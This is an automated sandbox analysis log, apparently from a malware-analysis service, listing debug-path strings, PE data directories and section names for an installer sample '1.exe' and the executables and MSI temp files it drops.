    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000010.00000002.2141976926.0000027536269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142022174.0000027536271000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000010.00000002.2141619079.0000027536038000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141673495.0000027536061000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbp source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000004.00000002.2258821783.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 00000004.00000000.1278293993.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000002.2228034287.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp, 1.exe, 0000000B.00000000.1506124351.0000000000B1B000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000010.00000002.2143619192.00000275384D7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C542000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2143996373.0000027538601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000010.00000002.2152851564.000002753B481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2152469734.000002753B46A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538476000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000004.00000003.1588667153.000000000C3C1000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000010.00000002.2167406026.00007FF7D9618000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000010.00000002.2142891564.0000027538203000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142946137.0000027538231000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2143876894.00000275385C3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143920191.00000275385D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000010.00000002.2141698149.0000027536080000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141733839.00000275360A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbG source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143143857.00000275382D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143093774.00000275382B5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2140154271.00000234A0702000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000010.00000002.2143527590.0000027538491000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143445237.000002753847A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143023677.0000027538281000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000010.00000002.2143603521.00000275384C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143558064.00000275384B4000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261349602.000002BDD0C71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000010.00000002.2139801818.000002349ED73000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139872986.000002349ED81000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000010.00000002.2143445237.0000027538472000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000004.00000003.1315095135.0000000009710000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000010.00000002.2150780721.000002753B393000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151073254.000002753B3A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: shiA18.tmp.4.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
    Source: C:\Users\user\Desktop\1.exeCode function: 11_2_009C0430 LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,11_2_009C0430
    Source: 1.exeStatic PE information: section name: .didat
    Source: 1.exeStatic PE information: section name: .fptable
    Source: ShortcutFlags.dll.4.drStatic PE information: section name: .fptable
    Source: MainSoftware.exe.4.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.4.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.4.drStatic PE information: section name: Section
    Source: MainSoftware.exe.4.drStatic PE information: section name: _RDATA
    Source: SoftwareDistributor.exe.4.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.4.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.4.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.4.drStatic PE information: section name: _RDATA
    Source: MSICFE.tmp.4.drStatic PE information: section name: .fptable
    Source: MSID4D.tmp.4.drStatic PE information: section name: .fptable
    Source: shiA18.tmp.4.drStatic PE information: section name: .wpp_sf
    Source: shiA18.tmp.4.drStatic PE information: section name: .didat
    Source: MSIAC4.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIB81.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIBE0.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIC2F.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIC5F.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIC9E.tmp.4.drStatic PE information: section name: .fptable
    Source: MSICCE.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIEA6.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIEE5.tmp.4.drStatic PE information: section name: .fptable
    Source: MSIF15.tmp.4.drStatic PE information: section name: .fptable
    Source: SoftwareDistributor.exe.7.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.7.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.7.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.7.drStatic PE information: section name: _RDATA
    Source: MainSoftware.exe.7.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.7.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.7.drStatic PE information: section name: Section
    Source: MainSoftware.exe.7.drStatic PE information: section name: _RDATA
    Source: MSI5903.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI5971.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI59B1.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI5A00.tmp.7.drStatic PE information: section name: .didat
    Source: MSI5A00.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI7AA9.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI7B27.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI7B86.tmp.7.drStatic PE information: section name: .fptable
    Source: MSI8914.tmp.7.drStatic PE information: section name: .fptable
    Source: shi56C1.tmp.11.drStatic PE information: section name: .wpp_sf
    Source: shi56C1.tmp.11.drStatic PE information: section name: .didat
    Source: Install.exe.part.13.drStatic PE information: section name: .CLR_UEF
    Source: Install.exe.part.13.drStatic PE information: section name: .didat
    Source: Install.exe.part.13.drStatic PE information: section name: Section
    Source: Install.exe.part.13.drStatic PE information: section name: _RDATA
    Source: Install.exe.21.drStatic PE information: section name: .managed
